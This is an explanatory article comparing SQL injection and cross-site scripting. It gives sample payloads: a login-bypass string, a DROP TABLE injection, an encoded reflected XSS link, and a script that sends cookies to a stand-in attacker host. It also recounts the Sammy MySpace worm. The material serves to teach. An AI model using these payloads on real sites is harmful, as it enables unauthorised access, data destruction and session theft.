SQL Injection vs. Cross-Site Sripting
There are many different types of attacks hackers can conduct in order to take partial or total control of a website. In general the most common and dangerous ones are SQL injections and cross-site scripting (XSS).
SQL injection is a technique to inject a piece of a malicious code in a web application, exploiting security vulnerability at the database level to change its behavior. Applications often use user-supplied data to create SQL statements. If such commands are executed, they do so under the context of the user specified by the application executing the statement. This capability allows attackers to gain control of all database resources accessible by that user, up to and including the ability to execute commands on the hosting system. With this powerful technique the attacker could manipulate URLs (query strings) or any form (search, login, email registration) to inject malicious code. Ability to change the logic of SQL statements executed against the database is extremely dangerous for an e-Commerce sites or any other site that keeps sensitive information in the database like SSN, CC numbers etc.
Some samples of SQL injections are:
SQL Injection using Dynamic Strings
A web based application form might build a SQL request to the database as string combining Username & Password in order to retrieve account information from database.
SELECT Username FROM Users WHERE Username = [value] AND Password = [value]
If the attacker submits login and password as
Password: bar’ OR ‘ ‘=’ ‘
SQL command string would look like
SELECT Username FROM Users WHERE Username = ‘foo’ AND Password = ‘bar’ OR ‘ ‘=’ ‘
This query will return all rows from the user’s database, regardless of whether the foo is a real username or bar is a legitimate password. This is due to the OR statement appended to WHERE clause. The comparison ‘ ‘=’ ‘ will always return true result, making the overall WHERE clause evaluate to true for all rows in the table. If this is used for authentication purposes, the attacker will often be logged in as the first or last user in Users table.
SQL Injection in Stored Procedures
Stored procedures accept parameters which this type of attack is relaying on.
exec SignInUser ‘ ” + Username + “,’ ” + Password + “ ’ ”
First password option bar’ OR ‘ ‘=’ ’
would register attacker as user into application while second password option ‘; DROP TABLE Users–‘ would drop/delete table from database
Password: ‘; DROP TABLE Users–‘
Cross-Site Scripting (XSS)
Very powerful and popular hacking technique that injects malicious code in a webpage through user input without any further validation before returning it to the final user. In essence the attacker would submit code to webpage that would be echoed to the end user without further validation.
There are three types of XSS attacks:
Non-Persistent XSS Attacks
On web portals where user have a personalized view of a web site and is being greeted after logging in with “Welcome, <your username>”, data is often referenced through query string like
http://portal.example/index.php?sessionid=12312312& username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 %63%72%69%70%74%3E
Persistent XSS Attacks
<SCRIPT>document.location = ‘http://attackerhost.example/cgi-bin/cookiesteal.cgi?+’document.cookie</SCRIPT>
Due to attack payload being stored on the server this form of XSS attack is persistent.
DOM-based XSS Attacks.
Unlike two previous flavors of XSS attacks, DOM based XSS does not require web server to receive the malicious XSS payload. Instead DOM based XSS, the attacker abuses runtime embedding of attacker data in the client side, from within a page served from web server.
If for example
http://www.vulnerablesite.example/index.html contains script like
<HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT>var pos = document.URL.indexOf(“name=”)+5; document.write(document.URL.substring(pos, document.URL.length));</SCRIPT>
Welcome to our system … </HTML>
Cross-Site Scripting Worms and Malware
The best example of a Web Worm is Sammy Worm, the first major worm of its kind, spread by exploiting a persistent XSS vulnerability in MySpace.com’s personal profile web page template. The author of the Sammy Worm bypassed MySpace filtering and infected his profile page on myspace.com Since then every user’s profile that ever visited Sammy’s profile page was automatically updated with malicious code and Sammy was added as their friend as well. This attack resulted with over 1 million infected profiles within 24 hours. MySpace was force to shut-down its website in order to stop infection fix vulnerability filters and perform a clean-up.